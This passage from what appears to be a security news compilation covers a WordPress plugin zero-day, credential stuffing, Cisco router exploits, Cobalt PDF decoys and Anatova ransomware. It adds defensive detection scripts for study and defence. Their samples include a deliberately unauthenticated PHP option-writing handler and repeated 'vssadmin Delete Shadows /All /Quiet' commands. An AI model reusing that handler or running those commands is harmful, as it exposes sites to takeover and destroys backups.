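# Constructed PHP: one handler registered for both hooks with no checks (the flaw
# pattern), one harmless unauthenticated read, and one properly guarded write.
SAMPLE_PHP = r"""<?php
add_action('wp_ajax_td_set_option', 'td_set_option');
add_action('wp_ajax_nopriv_td_set_option', 'td_set_option');
function td_set_option() {
    update_option(sanitize_key($_POST['name']), $_POST['value']);
    wp_send_json_success();
}
add_action('wp_ajax_nopriv_td_get_total', 'td_get_total');
function td_get_total() {
    wp_send_json(array('total' => get_option('td_total', 0)));
}
add_action('wp_ajax_td_admin_set_option', 'td_admin_set_option');
function td_admin_set_option() {
    check_ajax_referer('td_admin', 'nonce');
    if (!current_user_can('manage_options')) { wp_send_json_error(null, 403); }
    update_option('td_setting', sanitize_text_field($_POST['value']));
}
"""

if __name__ == "__main__":
    for action, cb, sev, reason in audit(SAMPLE_PHP):
        print(f"[{sev}] wp_ajax action '{action}' -> {cb}(): {reason}")
```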

Attackers can perform many other malicious actions, including accessing mailing lists from Constant Contact and Mailchimp, and modifying or deleting recurring Stripe payment plans, since Total Donations can connect to Stripe as a payment processor.

Attackers can also send test emails to an arbitrary address, an action that could be automated to cause a Denial of Service (DoS) of outbound email, either by triggering the host’s outgoing mail relay limits or by causing the victim site to be listed on spam blacklists.

The plugin is currently unavailable for purchase on Envato’s CodeCanyon; its page has displayed a “Coming Soon” notice since May 2018.

“These security flaws are considered zero-day vulnerabilities due to their active exploitation and a lack of an available patch,” researchers explained. “Unfortunately, the process of making this contact revealed that a solution may not ever be coming.”

Pierluigi Paganini

(SecurityAffairs – Total Donations, WordPress plugin)


Dailymotion forces password reset in response to credential stuffing Attack

The popular video sharing website Dailymotion announced that some accounts were accessed by hackers as a result of a massive credential stuffing attack.

On Friday, the popular video sharing website Dailymotion announced that some accounts had been hit by hackers. The company detected unauthorized access attempts resulting from credential stuffing activity, blocked the intrusion attempts and notified potentially affected users.

“Dailymotion announces being subject to a large-scale computer attack aimed at compromising the data of its users.” reads the press release published by the firm.

“The attack, which was discovered by Dailymotion technical teams and is still ongoing, was successfully contained following the implementation of measures to limit its scope. Potentially impacted users have been contacted directly by dailymotion to inform them and provide them with personalized support.”

The attempts were first observed on January 19 and lasted for at least seven days.

After discovering the attempts, the French firm logged the affected users out and forced a password reset, including in the notification a link to change the password and regain access to the account.


The company has also informed the French Data Protection Authority (CNIL) of the attack, as required by the European Union General Data Protection Regulation (GDPR).

Dailymotion reported that attackers were attempting to take over the accounts via brute force attacks or by using stolen credentials obtained from third-party data breaches.

“The attack consists in “guessing” the passwords of some dailymotion accounts by automatically trying a large number of combinations, or by using passwords that have been previously stolen from web sites unrelated to dailymotion.” continues the company.
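The distinction the company draws (guessing passwords against a few accounts versus replaying stolen credential pairs across many accounts) is what a login-log detector keys on. The following Python is an added example, not Dailymotion’s code; the log line format and the sample lines are constructed.

```python
"""Classify login bursts per source IP as credential stuffing or brute force.

Added example, not Dailymotion's code. Assumed (constructed) log line format:
  <ISO timestamp> login ip=<addr> user=<name> result=<ok|fail>"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

LINE_RE = re.compile(
    r"^(?P<ts>\S+) login ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


@dataclass
class SourceStats:
    attempts: int = 0
    failures: int = 0
    users: set = field(default_factory=set)      # distinct accounts tried
    succeeded: set = field(default_factory=set)  # accounts this source got into


def parse_lines(lines):
    """Aggregate attempts per source IP; malformed lines are skipped."""
    stats = defaultdict(SourceStats)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        s = stats[m["ip"]]
        s.attempts += 1
        s.users.add(m["user"])
        if m["result"] == "fail":
            s.failures += 1
        else:
            s.succeeded.add(m["user"])
    return stats


def classify(s, min_attempts=20, min_fail_rate=0.8):
    """stuffing    = many distinct accounts, one or two tries each (leaked pairs replayed)
    brute_force = a few accounts, many tries each (password guessing)
    normal      = too few attempts, or a healthy success rate"""
    if s.attempts < min_attempts or s.failures / s.attempts < min_fail_rate:
        return "normal"
    tries_per_user = s.attempts / len(s.users)
    if len(s.users) >= 10 and tries_per_user <= 2:
        return "stuffing"
    if len(s.users) <= 3 and tries_per_user >= 10:
        return "brute_force"
    return "suspicious"


def detect(lines):
    """Return ({ip: label} for flagged sources, accounts a flagged source logged
    into). The second set is the list that needs a forced password reset."""
    flags, compromised = {}, set()
    for ip, s in parse_lines(lines).items():
        label = classify(s)
        if label == "normal":
            continue
        flags[ip] = label
        compromised |= s.succeeded
    return flags, compromised


def _build_sample():
    """Constructed log: one stuffing source (30 leaked pairs, one still valid),
    one brute-force source hammering 'admin', and a normal user with a typo."""
    lines = []
    for i in range(30):
        result = "ok" if i == 17 else "fail"
        lines.append(f"2019-01-19T10:00:{i:02d}Z login ip=198.51.100.7 user=user{i:02d} result={result}")
    for i in range(25):
        lines.append(f"2019-01-19T10:01:{i:02d}Z login ip=203.0.113.9 user=admin result=fail")
    lines += [
        "2019-01-19T10:02:00Z login ip=192.0.2.4 user=alice result=fail",
        "2019-01-19T10:02:07Z login ip=192.0.2.4 user=alice result=ok",
    ]
    return lines


SAMPLE_LINES = _build_sample()

if __name__ == "__main__":
    flags, compromised = detect(SAMPLE_LINES)
    print(flags, sorted(compromised))
```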

The security team announced that it is working to improve the protection of its user data.

Unfortunately, it is quite easy to find huge credential archives for sale on the Dark Web and to use the data they contain to carry out credential stuffing attacks.

Recently the popular cyber security expert Troy Hunt revealed the discovery of Collection #1 archive containing 773 million credentials, the huge dump was offered for just $45.

To prevent credential stuffing attacks, users should choose a unique password for every online service they use and enable two-factor authentication on the account where available.

In 2016, Dailymotion suffered a massive data breach that exposed 87 million accounts.

Pierluigi Paganini


(SecurityAffairs – hacking, credential stuffing attacks)


Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online

Cisco released security updates to address security flaws in several products including Small Business RV320/RV325 routers and hackers are already targeting them.

The tech giant addressed two serious issues in its Small Business RV320 and RV325 routers. The first can be exploited by a remote, unauthenticated attacker to obtain sensitive information (CVE-2019-1653), while the second can be exploited by a remote attacker with admin privileges for command injection (CVE-2019-1652).

Now hackers are targeting Cisco RV320/RV325 routers using new exploits.

After the disclosure of proof-of-concept exploit code for security flaws in Cisco RV320 and RV325 routers, hackers started scanning the Internet for vulnerable devices in an attempt to compromise them.

Cisco this week announced updates for router models RV320 and RV325 that fix a command injection (CVE-2019-1652) and an information disclosure (CVE-2019-1653) vulnerability; both of them are in the routers’ web management interface.

By chaining the two flaws it is possible to take over Cisco RV320 and RV325 routers: attackers exploit the information disclosure bug to obtain the hashed password of a privileged account, and then the command injection bug to run arbitrary commands as root.

Both vulnerabilities were reported by experts at the RedTeam Pentesting firm, who published proof-of-concept exploit code for the flaws after Cisco released the security updates addressing them.

The experts published proof-of-concept (PoC) exploit code for the command injection issue, the information disclosure flaw, and the data leak vulnerability.

Other PoC exploits were published by the security researcher David Davidson, who successfully tested them on Cisco RV320 routers.

Searching Shodan for vulnerable Cisco RV320 and RV325 routers, it is possible to find tens of thousands of devices online.

The popular expert Troy Mursch, chief research officer at Bad Packets, searched for vulnerable systems using the BinaryEdge search engine and found 9,657 devices exposed online (6,247 Cisco RV320 routers and 3,410 Cisco RV325 routers).

Mursch created an interactive map showing the geographic distribution of the vulnerable routers; the vast majority are located in the US.


“Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly.” reads a blog post published by Mursch on Badpackets.

“However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation,”

Pierluigi Paganini

(SecurityAffairs – Cisco RV320/RV325 routers, IoT)



Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group targeted more than 20 other government and financial institutions worldwide. 

The Cobalt crime gang is a Russian hacking crew that has been active since at least 2016 and has targeted banks worldwide. The group relies on spear-phishing emails to compromise target systems, spoofing messages from financial institutions or from a financial supplier or partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently, the hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to victims. The threat actors used HTTPS URLs pointing to Google App Engine; with this technique the attackers attempt to trick the victim into believing they are accessing a resource hosted by Google.


Attackers used specially crafted PDF documents, created with Adobe Acrobat 18.0, that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards by the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 
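A triage script for this decoy pattern needs two pieces: inflating FlateDecode streams to reach the hidden `/URI`, and recognising an appengine.google.com link whose `continue=` parameter leads off Google. The following Python is an added example, not Netskope’s tooling; the minimal PDF it scans is constructed in code, and the App Engine path and lure target are placeholders.

```python
"""Pull every /URI out of a PDF, inflating FlateDecode streams first, and flag
links that bounce through appengine.google.com to a non-Google target.

Added example, not Netskope's tooling; the sample PDF is constructed in code."""
import re
import zlib
from urllib.parse import parse_qs, urlparse

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# PDF literal string: ( ... ) with backslash escapes
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")


def _unescape(raw: bytes) -> str:
    return re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")


def extract_uris(pdf: bytes):
    """Return the sorted set of URIs found in the raw file and in inflated streams."""
    bodies = [pdf]
    for m in STREAM_RE.finditer(pdf):
        try:
            bodies.append(zlib.decompress(m.group(1)))  # /Filter /FlateDecode
        except zlib.error:
            pass  # uncompressed or another filter: the raw scan still covers it
    found = {_unescape(u) for body in bodies for u in URI_RE.findall(body)}
    return sorted(found)


def _is_google(host: str) -> bool:
    return host == "google.com" or host.endswith(".google.com")


def classify_uri(uri: str) -> str:
    """appengine-redirect = appengine.google.com link whose continue= target leaves
    Google (the decoy pattern above); google-hosted = other Google host; external."""
    p = urlparse(uri)
    host = (p.hostname or "").lower()
    if host == "appengine.google.com":
        target = parse_qs(p.query).get("continue", [""])[0]
        target_host = (urlparse(target).hostname or "").lower()
        if target_host and not _is_google(target_host):
            return "appengine-redirect"
    return "google-hosted" if _is_google(host) else "external"


def build_sample_pdf(uri: str) -> bytes:
    """Constructed minimal PDF: a link annotation stored inside a FlateDecode
    stream, as the decoys did. Enough for the scanner, not a fully valid document."""
    annot = b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (" + uri.encode() + b") >> >>"
    data = zlib.compress(annot)
    return (b"%PDF-1.7\n1 0 obj\n<< /Length " + str(len(data)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + data + b"\nendstream\nendobj\n%%EOF\n")


# Constructed lure: the App Engine path and the continue= target are placeholders
SAMPLE_URI = "https://appengine.google.com/_ah/logout?continue=https://lure.example/invoice.doc"

if __name__ == "__main__":
    for u in extract_uris(build_sample_pdf(SAMPLE_URI)):
        print(classify_uri(u), u)
```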

PDF readers prompt a security warning when a document connects to a website, but once “remember this action for this site” is checked for a domain, the warning is no longer displayed. There are two possible scenarios:

  • the prompt refers to appengine.google.com, and victims will likely allow it to reach the website;
  • appengine.google.com has been whitelisted by administrators for legitimate reasons, so the prompt is not displayed at all.

The Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victim enables the macro, another stage payload is downloaded.

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (csmtp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method, in which malicious scriptlets are loaded through native Windows applications; it allows attackers to bypass application whitelisting solutions such as Windows AppLocker.

“At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’,” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


Security Affairs newsletter Round 198 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: 20% discount. It is available as a Kindle Edition and as a Paper Copy.

Once again thank you!

Collection #1 Data Breach Analysis – Part 1
DarkHydrus adds Google Drive support to its RogueRobin Trojan
Russian hacker Alexander Zhukov extradited by Bulgaria to US
A flaw in MySQL could allow rogue servers to steal files from clients
Iranian developer advertised BlackRouter RaaS
Omron addressed multiple flaws in its CX-Supervisor product
Unpatched Cisco critical flaw CVE-2018-15439 exposes small Business Networks to hack
Adobe fixed XSS flaws in Experience Manager that can result in information Disclosure
Critical flaw in Linux APT package manager could allow remote hack
Did you win at online casinos? Watch out, your data might have had exposed online
France watchdog fines Google with $57 million under the EU GDPR
0patch releases unofficial security patches for 3 Windows flaws yet to be fixed
Hacker threatened a family using a Nest Camera to broadcast a fake missile attack alert
PHP PEAR official site hacked, tainted package manager distributed for 6 months
URLhaus identified and shut down 100,000 malware sites in 10 Months
Cisco addresses flaws in its products, including Small Business routers and Webex
DHS issues emergency Directive to prevent DNS hijacking attacks
Expert shares PoC exploit code for remote iOS 12 jailbreak On iPhone X
Kaspersky links GreyEnergy and Zebrocy activities
New Russian Language Malspam is delivering Redaman Banking Malware
Microsoft Exchange zero-day and exploit could allow anyone to be an admin
The Story of Manuels Java RAT.
Two distinct campaigns spread GandCrab ransomware and Ursnif Trojan via weaponized docs
Anatova ransomware – Expert believe it will be a dangerous threat
Collection #1 Data Breach Analysis – Part 2
Local privilege escalation bug fixed in CheckPoint ZoneAlarm
Upcoming Ukraine elections in the crosshairs of hackers

Pierluigi Paganini

(SecurityAffairs – newsletter)


Anatova ransomware – Expert believe it will be a dangerous threat

Security experts at McAfee have discovered a new malware, dubbed Anatova ransomware, that has been spotted infecting computers worldwide.

The name Anatova is based on a name in the ransom note that is dropped on the infected systems.

The Anatova ransomware stands out for its obfuscation capabilities and its ability to infect network shares; it has a modular structure that allows new functions to be added to the malware.

“During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network.” reads the analysis published by McAfee.

Malware experts from McAfee discovered the Anatova ransomware on a private peer-to-peer network. Anatova uses the icon of a game or application to trick victims into downloading and executing it.

The malware uses a manifest to request admin rights, implements several effective protections against static analysis, and performs a few checks to avoid running in a sandbox.

The malware demands $700 in ransom to decrypt the data.

The largest number of infections was observed in the United States, followed by Germany, Belgium, France, and the UK. It is interesting to note that the malware doesn’t infect systems in a list of countries that includes all CIS countries, Syria, Egypt, Morocco, Iraq, and India.


“It’s quite normal to see the CIS countries being excluded from execution and often an indicator that the authors might be originating from one of these countries.” continue the experts. “In this case it was surprising to see the other countries being mentioned. We do not have a clear hypothesis on why these countries in particular are excluded.”

The ransomware looks for files smaller than 1 MB and avoids encrypting operating system files. Anatova also checks for network shares; this is particularly dangerous in large organizations, because a single infection can cause severe problems on several systems across the company network.

Each Anatova sample uses its own key; this implies there is no master key that could be used to decrypt all victims’ files.

After encrypting the files, the ransomware wipes the key, IV, and private RSA key values from memory, to prevent anyone from dumping this information from memory and using it to decrypt files.

“When all this is done, Anatova will destroy the Volume Shadow copies 10 times in very quick succession. Like most ransomware families, it is using the vssadmin program, which required admin rights, to run and delete the volume shadow copies.” states McAfee.
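The ten rapid vssadmin runs described above are a detection opportunity: a single shadow-copy deletion can be legitimate maintenance, a burst on one host is the ransomware pattern. The following Python is an added example, not McAfee’s code; the process-creation line format and sample events are constructed.

```python
"""Flag hosts where shadow copies are deleted repeatedly in a short window, the
behaviour the analysis above describes (ten vssadmin runs in quick succession).

Added example, not McAfee's code. Assumed (constructed) process-creation line format:
  <ISO timestamp> host=<name> pid=<n> image=<path> cmd=<command line>"""
import re
from collections import defaultdict, deque
from datetime import datetime

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)
# vssadmin ... delete ... shadows, case-insensitive; 'vssadmin list shadows' must not match
SHADOW_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)


def parse_events(lines):
    """Parse lines into event dicts; malformed lines are skipped."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append({"ts": ts, "host": m["host"], "pid": int(m["pid"]),
                       "image": m["image"], "cmd": m["cmd"]})
    return events


def find_shadow_delete_bursts(lines, threshold=3, window_s=60):
    """Return {host: peak count} for hosts with >= threshold shadow-copy deletions
    inside any window_s-second span. Sliding window per host, events sorted by time."""
    recent = defaultdict(deque)
    hits = {}
    for ev in sorted(parse_events(lines), key=lambda e: e["ts"]):
        if not SHADOW_DELETE_RE.search(ev["cmd"]):
            continue
        q = recent[ev["host"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            hits[ev["host"]] = max(hits.get(ev["host"], 0), len(q))
    return hits


def _build_sample():
    """Constructed events: WS01 shows the Anatova-style burst, WS02 a single admin
    run, plus noise that must not match."""
    lines = [
        f"2019-01-22T14:03:{i:02d}Z host=WS01 pid={4100 + i} image=C:\\Windows\\System32\\vssadmin.exe "
        "cmd=vssadmin.exe Delete Shadows /All /Quiet"
        for i in range(10)
    ]
    lines += [
        "2019-01-22T09:15:00Z host=WS02 pid=2210 image=C:\\Windows\\System32\\vssadmin.exe "
        "cmd=vssadmin delete shadows /for=C: /oldest",
        "2019-01-22T09:16:00Z host=WS02 pid=2215 image=C:\\Windows\\System32\\vssadmin.exe "
        "cmd=vssadmin list shadows",
        "2019-01-22T14:03:05Z host=WS01 pid=4200 image=C:\\Windows\\System32\\cmd.exe "
        "cmd=cmd.exe /c echo shadows",
    ]
    return lines


SAMPLE_EVENTS = _build_sample()

if __name__ == "__main__":
    print(find_shadow_delete_bursts(SAMPLE_EVENTS))  # {'WS01': 10}
```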

According to McAfee, the Anatova ransomware was developed by skilled vxers; the researchers believe it is a prototype still being tested, with the potential to become a serious threat.

Additional details, including IoCs, are reported in the analysis published by McAfee.

Pierluigi Paganini

(SecurityAffairs – Anatova ransomware, cybercrime)
